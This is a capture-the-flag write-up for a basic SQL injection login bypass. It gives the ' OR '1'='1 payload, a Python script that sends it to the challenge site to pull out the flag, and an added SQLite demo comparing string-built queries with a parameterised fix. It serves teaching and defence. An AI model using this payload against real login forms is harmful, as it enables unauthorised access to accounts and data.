The Challenge

A login form. The backend builds the SQL query by string-concatenating user input without sanitisation.

Approach

' OR '1'='1 closes the existing string literal, appends a condition that is always true, and reopens the string. The resulting query returns all rows, satisfying the login check and printing the flag.

Solution

import requests

site = "http://basic-sqli.challs.olicyber.it/"
payload = "' OR '1'='1"
r = requests.post(site, data={"username": payload, "password": payload})
# Locate "flag{" and the first "}" after it, so an earlier "}" in the HTML cannot truncate the match.
start = r.text.find("flag{")
print(r.text[start:r.text.find("}", start)] + "}", end="")

Both fields use the payload. The response HTML contains flag{...}; str.find locates the start and end to extract exactly the flag token.

What I Learned

OR-based login bypass is the foundation of SQL injection. It works whenever user input is directly interpolated into a WHERE clause without parameterised queries or escaping. Sending the payload in both fields avoids situations where only one field is vulnerable.
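To make the mechanism in the Approach and the lesson above concrete, here is an added example (not part of the writeup or the challenge backend) that reproduces the bug against an in-memory SQLite table with constructed credentials, and places the string-concatenated query beside its parameterised fix. The `users` table, the `admin` row and the function names are assumptions for the demo. It also shows why the writeup sends the payload in both fields: with SQL's `AND` binding tighter than `OR`, the payload in the username field alone does not satisfy the concatenated query, while the payload in the password field does.

```python
import sqlite3

PAYLOAD = "' OR '1'='1"


def make_db():
    # Constructed sample data standing in for the challenge backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The defect the challenge describes: user input spliced straight into the WHERE clause.
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # A quote in the input ends the literal; the rest of the input becomes SQL.
    # With the payload in both fields the clause reads
    #   username = '' OR '1'='1' AND password = '' OR '1'='1'
    # which is true for every row, so any credentials "succeed".
    return conn.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_parameterised(conn, username, password):
    # The fix: values are bound by the driver and never parsed as SQL, so the
    # same payload is just a username that does not exist.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("concatenated, payload in both fields:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("concatenated, payload in username only:", login_vulnerable(db, PAYLOAD, "x"))
    print("parameterised, payload in both fields:", login_parameterised(db, PAYLOAD, PAYLOAD))
```

The `login_vulnerable` function keeps the precedence behaviour of real SQL engines: `username = '' OR '1'='1' AND password = 'x'` groups as `username = '' OR ('1'='1' AND password = 'x')`, which is false, whereas `username = 'x' AND password = '' OR '1'='1'` ends with an unconditional `OR '1'='1'` and is true. Reviewing a code base for string-built queries and replacing them with bound parameters, as in `login_parameterised`, removes the whole class of bypass rather than one payload.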